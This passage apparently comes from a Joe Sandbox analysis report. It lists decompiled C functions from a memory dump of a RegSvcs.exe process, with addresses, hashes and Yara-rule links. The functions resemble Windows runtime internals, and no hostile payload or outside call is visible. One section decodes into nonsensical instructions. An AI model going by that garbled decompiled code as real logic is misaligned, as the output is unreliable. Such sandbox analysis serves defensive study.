									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x13e5768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0130FFB0(_t51, _t64, 0x13e8a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E0133B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                          0x013a3d40
                                          0x013a3d48
                                          0x013a3d52
                                          0x013a3d59
                                          0x013a3d5d
                                          0x013a3d61
                                          0x013a3d63
                                          0x013a3d67
                                          0x013a3d69
                                          0x013a3d72
                                          0x013a3d76
                                          0x013a3d7a
                                          0x013a3d7f
                                          0x013a3d8b
                                          0x013a3d91
                                          0x013a3d91
                                          0x013a3d91
                                          0x013a3d94
                                          0x013a3d96
                                          0x013a3d9d
                                          0x013a3da1
                                          0x013a3db0
                                          0x013a3dba
                                          0x013a3dbc
                                          0x013a3dbc
                                          0x013a3dc6
                                          0x013a3dcb
                                          0x013a3dcf
                                          0x013a3dd1
                                          0x013a3dd4
                                          0x00000000
                                          0x00000000
                                          0x013a3dd9
                                          0x013a3e0c
                                          0x013a3e0c
                                          0x013a3e0f
                                          0x013a3ddb
                                          0x013a3ddb
                                          0x013a3de0
                                          0x00000000
                                          0x013a3de2
                                          0x013a3de2
                                          0x013a3de4
                                          0x013a3de8
                                          0x013a3deb
                                          0x013a3df1
                                          0x00000000
                                          0x013a3df3
                                          0x013a3df3
                                          0x013a3df5
                                          0x013a3df8
                                          0x013a3dfa
                                          0x00000000
                                          0x013a3dfa
                                          0x013a3df1
                                          0x013a3de0
                                          0x013a3e11
                                          0x013a3e11
                                          0x00000000
                                          0x013a3dfe
                                          0x013a3e04
                                          0x013a3e06
                                          0x00000000
                                          0x013a3e06
                                          0x00000000
                                          0x013a3e04
                                          0x013a3d91
                                          0x013a3e15
                                          0x013a3e1a
                                          0x013a3e1f
                                          0x013a3e1f
                                          0x013a3e23
                                          0x013a3e29
                                          0x00000000
                                          0x00000000
                                          0x013a3e2e
                                          0x00000000
                                          0x013a3e30
                                          0x013a3e30
                                          0x013a3e35
                                          0x00000000
                                          0x013a3e37
                                          0x013a3e3e
                                          0x013a3e42
                                          0x013a3e48
                                          0x013a3e4e
                                          0x00000000
                                          0x013a3e4e
                                          0x013a3e35
                                          0x00000000
                                          0x013a3e2e
                                          0x013a3e5b
                                          0x013a3e5c
                                          0x013a3e5d
                                          0x013a3e68
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: c7f08ee81219e9ede0a749348b42b43370eb114aa3ce3eb018de01b963422956
                                          • Instruction ID: 2fdd1819f737f6eaf72d5832e4845cc5272d5fe10b48be5b3341a46461d612e5
                                          • Opcode Fuzzy Hash: c7f08ee81219e9ede0a749348b42b43370eb114aa3ce3eb018de01b963422956
                                          • Instruction Fuzzy Hash: 9A31AB72549306CFC725DF28C48485ABBE5FF85708F44496EE5988B281D730DD08CBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01334A2C Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E01334A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x13ed360 ^ _t62;
				_v8 =  *0x13ed360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01312280(_t26, 0x13e8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0130FFB0(_t41, _t51, 0x13e8608);
						L2:
						 *0x13eb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0133B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01312280(_t28, 0x13e8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0130FFB0(_t42, _t53, 0x13e8608);
							if(_t53 != 0) {
								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0130FFB0(_t41, _t51, 0x13e8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                          0x01334a2c
                                          0x01334a34
                                          0x01334a3c
                                          0x01334a3e
                                          0x01334a48
                                          0x01334a4b
                                          0x01334a4d
                                          0x01334a51
                                          0x01334a9c
                                          0x00000000
                                          0x00000000
                                          0x01334aa3
                                          0x01334aa8
                                          0x01334aad
                                          0x01334ab1
                                          0x01334ade
                                          0x01334ae3
                                          0x01334a5a
                                          0x01334a62
                                          0x01334a6a
                                          0x01334a6e
                                          0x0136f203
                                          0x01334a84
                                          0x01334a88
                                          0x01334a89
                                          0x01334a8a
                                          0x01334a95
                                          0x01334a95
                                          0x01334a79
                                          0x01334a80
                                          0x01334af2
                                          0x01334af4
                                          0x01334af9
                                          0x01334aff
                                          0x01334b01
                                          0x01334b03
                                          0x01334b08
                                          0x0136f20a
                                          0x0136f212
                                          0x0136f216
                                          0x0136f216
                                          0x01334b08
                                          0x01334b13
                                          0x01334b1a
                                          0x0136f229
                                          0x0136f229
                                          0x01334b1a
                                          0x01334a82
                                          0x00000000
                                          0x01334a82
                                          0x01334ab7
                                          0x01334acd
                                          0x01334acd
                                          0x01334ad5
                                          0x01334ada
                                          0x00000000
                                          0x01334ada
                                          0x01334ac2
                                          0x01334acb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01334acb
                                          0x01334a53
                                          0x01334a53
                                          0x01334a58
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 45a6528825bbb808464569c2315b339272eae785249d1e992f2a6fd1b793f87e
                                          • Instruction ID: 80551e8d1824c8e211aaee6398e5494a1f20c04c2af8b2623d5c83cdb68e4329
                                          • Opcode Fuzzy Hash: 45a6528825bbb808464569c2315b339272eae785249d1e992f2a6fd1b793f87e
                                          • Instruction Fuzzy Hash: 2131FF326053159BE7329F18C944B2ABBE8FBC1B28F00446DE9564B685CBB0D806CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01310050 Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E01310050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x13ed360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01329ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0133B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E013C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01329702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x13eb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                          0x01310055
                                          0x0131005d
                                          0x01310062
                                          0x0131006c
                                          0x0131006f
                                          0x01310074
                                          0x0131007a
                                          0x0131007a
                                          0x01310080
                                          0x01310080
                                          0x01310087
                                          0x0131008d
                                          0x0131008f
                                          0x01310093
                                          0x01310095
                                          0x0131009b
                                          0x013100f8
                                          0x013100fb
                                          0x013100fc
                                          0x013100ff
                                          0x01310108
                                          0x01310108
                                          0x013100a2
                                          0x013100a6
                                          0x013100b3
                                          0x013100bc
                                          0x013100c5
                                          0x013100ca
                                          0x0135c01e
                                          0x00000000
                                          0x00000000
                                          0x0135c02d
                                          0x013100d5
                                          0x013100d9
                                          0x0135c03d
                                          0x0135c046
                                          0x0135c046
                                          0x013100df
                                          0x013100e2
                                          0x013100ea
                                          0x013100ef
                                          0x013100f2
                                          0x013100f6
                                          0x01310111
                                          0x01310117
                                          0x01310117
                                          0x00000000
                                          0x013100f6
                                          0x013100d0
                                          0x013100d0
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 29bcbc35e025fb5eda9264b5b17d0c01dcdc07b766383d4fec343142251b9414
                                          • Instruction ID: 009882eedb41126f2f4a530f587195dd12bc6cb72d13e0a412bad4deae47c681
                                          • Opcode Fuzzy Hash: 29bcbc35e025fb5eda9264b5b17d0c01dcdc07b766383d4fec343142251b9414
                                          • Instruction Fuzzy Hash: B2318D31601B04CFD72ACF2CC840B96B7E9FF89718F14456DE5AA87A94EB75A841CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01322581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E01322581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912046) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed char _t237;
				signed char _t241;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t272;
				intOrPtr _t278;
				signed int _t280;
				signed int _t282;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				intOrPtr _t309;
				signed int _t318;
				signed int _t320;
				signed int _t321;
				signed int _t325;
				signed int _t326;
				void* _t328;
				signed int _t329;
				signed int _t331;
				signed int _t334;
				void* _t335;
				void* _t337;

				_t331 = _t334;
				_t335 = _t334 - 0x4c;
				_v8 =  *0x13ed360 ^ _t331;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t325 = 0x13eb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t278 = 0x48;
				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t318 = 0;
				_v37 = _t307;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t326 = 0xc0000106;
						goto L32;
					} else {
						_t325 = L01314620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t325;
						__eflags = _t325;
						if(_t325 == 0) {
							_t326 = 0xc0000017;
							goto L32;
						} else {
							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
							_t50 = _t325 + 0x48; // 0x48
							_t320 = _t50;
							_t307 = _v32;
							 *((intOrPtr*)(_t325 + 0x3c)) = _t278;
							_t280 = 0;
							 *((short*)(_t325 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t325 + 0x18) = _t320;
								__eflags = _t307 - 0x13e8478;
								 *_t325 = ((0 | _t307 == 0x013e8478) - 0x00000001 & 0xfffffffb) + 7;
								E0133F3E0(_t320,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t335 = _t335 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t320 = _t320 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E013839F2(_t320);
									_t307 = _v32;
									_t320 = _t272;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t326 = _v68;
								__eflags = 0;
								 *((short*)(_t320 - 2)) = 0;
								goto L32;
							} else {
								_t282 = _t325 + _t280 * 4;
								_v56 = _t282;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t233 =  *(_v60 + _t291 * 4);
										__eflags = _t233;
										if(_t233 == 0) {
											goto L30;
										} else {
											__eflags = _t233 == 5;
											if(_t233 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t282 =  *(_v60 + _t291 * 4);
										 *(_t282 + 0x18) = _t320;
										_t237 =  *(_v60 + _t291 * 4);
										__eflags = _t237 - 8;
										if(_t237 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t237 * 4 +  &M01322959))) {
												case 0:
													__ax =  *0x13e8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0133F3E0(__edi,  *0x13e848c, __ax & 0x0000ffff);
														__eax =  *0x13e8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0133F3E0(_t320, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x13e8480 & 0x0000ffff = E0133F3E0(__edi,  *0x13e8484,  *0x13e8480 & 0x0000ffff);
													__eax =  *0x13e8480 & 0x0000ffff;
													__eax = ( *0x13e8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0133F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0133F3E0(_t320, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t335 = _t335 + 0xc;
													_t320 = _t320 + (_t267 >> 1) * 2 + 2;
													__eflags = _t320;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t320 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x13e575c;
													__eflags = __ebx - 0x13e575c;
													if(__ebx != 0x13e575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0133F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x13e575c;
														} while (__ebx != 0x13e575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x13e8478 & 0x0000ffff = E0133F3E0(__edi,  *0x13e847c,  *0x13e8478 & 0x0000ffff);
													__eax =  *0x13e8478 & 0x0000ffff;
													__eax = ( *0x13e8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E013839F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x13e6e58 & 0x0000ffff = E0133F3E0(__edi,  *0x13e6e5c,  *0x13e6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x13e6e58 & 0x0000ffff;
													__eax = ( *0x13e6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t307 = _v32;
													L29:
													_t282 = _t282 + 4;
													__eflags = _t282;
													_v56 = _t282;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t237 =  *(_v60 + _t318 * 4);
						if(_t237 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t237 * 4 +  &M01322935))) {
							case 0:
								__ax =  *0x13e8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E01322E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x13e8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13e8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0130EEF0(0x13e79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0130EB70(__ecx, 0x13e79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t211 = _v72;
											__eflags = _t211;
											if(_t211 != 0) {
												L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
											}
											_t212 = _v52;
											__eflags = _t212;
											if(_t212 != 0) {
												__eflags = _t326;
												if(_t326 < 0) {
													L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
													_t212 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x13e7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0130EB70(__ecx, 0x13e79a0);
										__eax = _v52;
										L36:
										_pop(_t319);
										_pop(_t327);
										__eflags = _v8 ^ _t331;
										_pop(_t279);
										return E0133B640(_t212, _t279, _v8 ^ _t331, _t307, _t319, _t327);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t276 = E01322E3E(_t274,  &_v36);
									_t287 = _v36;
									_v76 = _t276;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x13e5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x13e8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13e8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x13e6e58 & 0x0000ffff;
								__eax = ( *0x13e6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t318 = _t318 + 1;
								if(_t318 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t292 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [edx], dh");
					asm("daa");
					_t241 = (_t237 ^  *_t292) + _t335 ^  *_t292 ^  *[es:ecx];
					_t328 = _t325 + 1;
					 *_t307 =  *_t307 - _t307;
					 *0x1f013226 =  *0x1f013226 + _t241;
					_pop(_t283);
					 *[ss:eax+ebp+0x5b350132] =  *[ss:eax+ebp+0x5b350132] + _t307;
					 *[ss:edx] =  *[ss:edx] + _t241;
					 *_t307 =  *_t307 - _t328;
					 *((intOrPtr*)(_t241 - 0x9fecdd8)) =  *((intOrPtr*)(_t241 - 0x9fecdd8)) + _t241;
					asm("daa");
					_push(ds);
					 *_t307 =  *_t307 - _t307;
					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t292;
					asm("daa");
					asm("fcomp dword [ebx+0x36]");
					 *((intOrPtr*)((_t241 ^  *_t292 ^  *_t292 ^  *_t292) +  &_a1546912046)) =  *((intOrPtr*)((_t241 ^  *_t292 ^  *_t292 ^  *_t292) +  &_a1546912046)) + _t328;
					_t337 = _t335 + _t292;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x13cff00);
					E0134D08C(_t283, _t320, _t328);
					_v44 =  *[fs:0x18];
					_t321 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t329 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t297 = _t249 * 0xc;
							_v48 = _t297;
							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x12d1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E0133E5C0(_a8,  *((intOrPtr*)(_t297 + 0x12d1668)), _t284);
									_t337 = _t337 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
										_t329 = E013751BE(_t284,  *((intOrPtr*)(_v48 + 0x12d166c)), _a16, _t321, _t329, __eflags, _a20, _a24);
										_v52 = _t329;
										break;
									} else {
										_t249 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t329;
						__eflags = _t329;
						if(_t329 < 0) {
							__eflags = _t329 - 0xc0000100;
							if(_t329 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t321;
									if( *_t293 == _t321) {
										_t329 = 0xc0000100;
										goto L76;
									} else {
										_t309 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t309 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t293) {
											__eflags =  *(_t309 + 0x1c);
											if( *(_t309 + 0x1c) == 0) {
												L106:
												_t329 = E01322AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t329;
												__eflags = _t329 - 0xc0000100;
												if(_t329 != 0xc0000100) {
													goto L69;
												} else {
													_t321 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t254 = E01306600( *(_t309 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t329 = E01322C50(_t293, _a8, _t284, _a16, _a20, _a24, _t321);
											L76:
											_v32 = _t329;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t329 = _a24;
									_t261 = E01322AE4( &_v36, _a8, _t284, _a16, _a20, _t329);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
